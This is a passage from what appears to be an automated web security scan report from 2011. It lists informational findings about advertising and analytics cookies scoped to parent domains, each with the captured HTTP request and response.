Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p97174789=exp=1&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 12:09:48 2011&prad=253735207&arc=186884836&; BMX_G=method->-1,ts->1303646988; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:09:51 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303646989%2E757%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;

17.35. http://ar.voicefive.com/bmx3/broker.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bmx3/broker.pli?pid=p86204458&PRAd=60003739&AR_C=40736478 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ar.voicefive.com
Cookie: ar_p86169922=exp=2&initExp=Sun Apr 24 16:47:57 2011&recExp=Sun Apr 24 16:48:03 2011&prad=57789606&arc=41386432&; BMX_G=method->-1,ts->1303663677; BMX_3PC=1; UID=e9305be3-24.143.206.75-1303663678

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 16:48:19 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p86204458=exp=1&initExp=Sun Apr 24 16:48:19 2011&recExp=Sun Apr 24 16:48:19 2011&prad=60003739&arc=40736478&; expires=Sat 23-Jul-2011 16:48:19 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 28564

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"60003739",Pid:"p86204458",Arc:"40736478",Location:CO
...[SNIP]...

17.36. http://ar.voicefive.com/bmx3/broker.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735207&AR_C=186884836 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/common/adRevresda.asp?channel=home&Section=main&adsize=728x90&pos=bottom
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 12:09:49 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=1&initExp=Sun Apr 24 12:09:49 2011&recExp=Sun Apr 24 12:09:49 2011&prad=253735207&arc=186884836&; expires=Sat 23-Jul-2011 12:09:49 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303646989; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 24700

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735207",Pid:"p97174789",Arc:"186884836",Location:
...[SNIP]...

17.37. http://ar.voicefive.com/bmx3/broker.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bmx3/broker.pli?pid=p86169922&PRAd=57789606&AR_C=41386432 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ar.voicefive.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 16:47:57 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p86169922=exp=1&initExp=Sun Apr 24 16:47:57 2011&recExp=Sun Apr 24 16:47:57 2011&prad=57789606&arc=41386432&; expires=Sat 23-Jul-2011 16:47:57 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303663677; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 24532

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"57789606",Pid:"p86169922",Arc:"41386432",Location:CO
...[SNIP]...

17.38. http://ar.voicefive.com/bmx3/broker.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bmx3/broker.pli?pid=p90175839&PRAd=3992125865291152&AR_C=6108753 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://img.mediaplex.com/content/0/3992/crucial_knows_notebook_728x90.html?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3992-125865-29115-2%3Fmpt%3D%5BCACHEBUSTER%5D&mpjs=ar.voicefive.com%2Fbmx3%2Fbroker.pli%3Fpid%3Dp90175839%26PRAd%3D3992125865291152%26AR_C%3D6108753&mpt=[CACHEBUSTER]&mpvc=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p97174789=exp=16&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 15:19:44 2011&prad=253732016&arc=207615354&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303658384%2E204%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 15:20:22 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p90175839=exp=1&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:22 2011&prad=3992125865291152&arc=6108753&; expires=Sat 23-Jul-2011 15:20:22 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26791

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"3992125865291152",Pid:"p90175839",Arc:"6108753",Loca
...[SNIP]...

17.39. http://ar.voicefive.com/bmx3/broker.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bmx3/broker.pli?pid=p81479006&PRAd=58779362&AR_C=40314462 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/pcw.main.news/topics/consumer_advice/article;pg=article;aid=149142;c=2206;c=1746;c=2210;pos=728leader;tile=1;sz=728x90;ord=02880823?;c=win7
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Apr 2011 19:49:07 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p81479006=exp=1&initExp=Sun Apr 24 19:49:07 2011&recExp=Sun Apr 24 19:49:07 2011&prad=58779362&arc=40314462&; expires=Sat 23-Jul-2011 19:49:07 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303674547; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27406

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58779362",Pid:"p81479006",Arc:"40314462",Location:CO
...[SNIP]...

17.40. http://asset.userfly.com/users/49267/userfly.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://asset.userfly.com
Path:   /users/49267/userfly.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /users/49267/userfly.js HTTP/1.1
Host: asset.userfly.com
Proxy-Connection: keep-alive
Referer: http://www.identitymanagement.com/?_kk=identity%20management&_kt=d37d8c67-315a-4919-abfc-41011051bd9e&gclid=CJvKs4D1tagCFeJ95Qodoi78Dg
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:44:04 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
X-Runtime: 6
Cache-Control: max-age=3600, private, max-stale=3600
Set-Cookie: capture_guid=3605dc32-6eab-11e0-991b-12313b03145d; domain=userfly.com; path=/
Status: 200
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 0


17.41. http://at.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://at.amgdgt.com
Path:   /ads/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/?t=pp&px=2853&rnd=[cachebuster] HTTP/1.1
Host: at.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUJOVvjFDHGBmzbDBIcekOVM7Pu2ADA3gBY2BgYGZgmhzKwOrwhIFRJ4.B4aPQfyBgYGDUzw9grGZg8rdhYHnhzcCoxcTAcOkZAwMDJ0guTXlWEFDOCirHCJR7AJdTklIHssHAd3MGAwMrAwNLCBMrIxtQWeAtRiYgxZLJyAqklhaAefK7GBmAxjPqt5b8aYRoBABTNBsn

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUXD2qAp.o9VSb5yRFcRQS0cy3DIQDA3gBY2BgYGZgmhzKwOrwhIFRJ4.B4aPQfyBgYGDUzw9grGZg8rdhYHnhzcCoxcTAcOkZAwMDJ0guTXlWEFDOCirHCJR7AJdTklIHssHAd3MGAwMrAwNLCBMrIxtQWeAtRiYgxZLJyAqklhaAefK7GIHOABrbWnU3DqIRAFGMGuw-; Domain=.amgdgt.com; Expires=Tue, 24-May-2011 03:08:32 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: http://ib.adnxs.com/seg?add=93909&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 03:08:31 GMT


17.42. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=8&c2=2101&rn=1429219633&c7=http%3A%2F%2Fdg.specificclick.net%2F%3Fy%3D3%26t%3Dh%26u%3Dhttp%253A%252F%252Fwww.neudesicmediagroup.com%252FAdvertising.aspx%253Fsite%253DSilverlight%26r%3D&c3=1234567891234567891&c9=http%3A%2F%2Fwww.neudesicmediagroup.com%2FAdvertising.aspx%3Fsite%3DSilverlight&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://dg.specificclick.net/?y=3&t=h&u=http%3A%2F%2Fwww.neudesicmediagroup.com%2FAdvertising.aspx%3Fsite%3DSilverlight&r=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 24 Apr 2011 15:57:30 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Tue, 23-Apr-2013 15:57:30 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


17.43. http://b.scorecardresearch.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=6035179&c3=1&c4=69113&c5=166308&c6=&cv=1.3&cj=1&rn=1548627385 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 24 Apr 2011 12:29:52 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Tue, 23-Apr-2013 12:29:52 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

17.44. http://b.scorecardresearch.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035308&d.c=gif&d.o=pcwmw-pcworld&d.x=192052059&d.t=page&d.u=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F149142%2Fidentity_theft_monitoring_services_called_waste.html HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/149142/identity_theft_monitoring_services_called_waste.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sun, 24 Apr 2011 19:51:35 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Tue, 23-Apr-2013 19:51:35 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

17.45. http://b.voicefive.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p97174789&c3=253735207&c4=186884836&c5=1&c6=1&c7=Sun%20Apr%2024%2012%3A09%3A48%202011&c8=http%3A%2F%2Fwww.hotelclub.com%2Fcommon%2FadRevresda.asp%3Fchannel%3Dhome%26Section%3Dmain%26adsize%3D728x90%26pos%3Dbottom&c9=&c10=http%3A%2F%2Fwww.hotelclub.com%2F&c15=&1303646992514 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/common/adRevresda.asp?channel=home&Section=main&adsize=728x90&pos=bottom
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; UID=875e3f1e-184.84.247.65-1303349046; ar_p97174789=exp=1&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 12:09:48 2011&prad=253735207&arc=186884836&; BMX_G=method->-1,ts->1303646988; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 24 Apr 2011 12:09:49 GMT
Connection: close
Set-Cookie: UID=875e3f1e-184.84.247.65-1303349046; expires=Tue, 23-Apr-2013 12:09:49 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


17.46. http://bh.contextweb.com/bh/rtset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=536088&ev=914804995789526&rurl=http://matcher.bidder7.mookie1.com/do-association?return=ctxweb HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/RTB/11377797616@x24?USNetwork/PizzaHut_2H_201008_ZT_18-49_All
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|534889.z2r8aytrpwakd.0|535461.2931142961646634775.1; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun GlassFish Enterprise Server v2.1.1
CW-Server: cw-web81
Cache-Control: no-cache, no-store
Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Wed, 18-Apr-2012 15:25:07 GMT; Path=/
Set-Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|536088.914804995789526.0|535461.2931142961646634775.1; Domain=.contextweb.com; Expires=Mon, 23-Apr-2012 15:25:07 GMT; Path=/
Location: http://matcher.bidder7.mookie1.com/do-association?return=ctxweb
Content-Type: text/html; charset=iso-8859-1
Content-Length: 0
Date: Sun, 24 Apr 2011 15:25:06 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"


17.47. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/set.aspx?action=replace&advid=541&token=LIFL1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|534889.z2r8aytrpwakd.0|535461.2931142961646634775.1; V=wOebwAz4UvVv; cwbh1=541%3B05%2F23%2F2011%3BLIFL1

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web84
Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Wed, 18-Apr-2012 03:08:32 GMT; Path=/
Set-Cookie: cwbh1=541%3B05%2F23%2F2011%3BLIFL1; Domain=.contextweb.com; Expires=Mon, 28-Mar-2016 03:08:32 GMT; Path=/
Content-Type: image/gif
Date: Sun, 24 Apr 2011 03:08:32 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

17.48. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/ActivityServer.bs

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /BurstingPipe/ActivityServer.bs?cn=as&ActivityID=44536&rnd=288817.4828887202 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: bs.serving-sys.com

Response

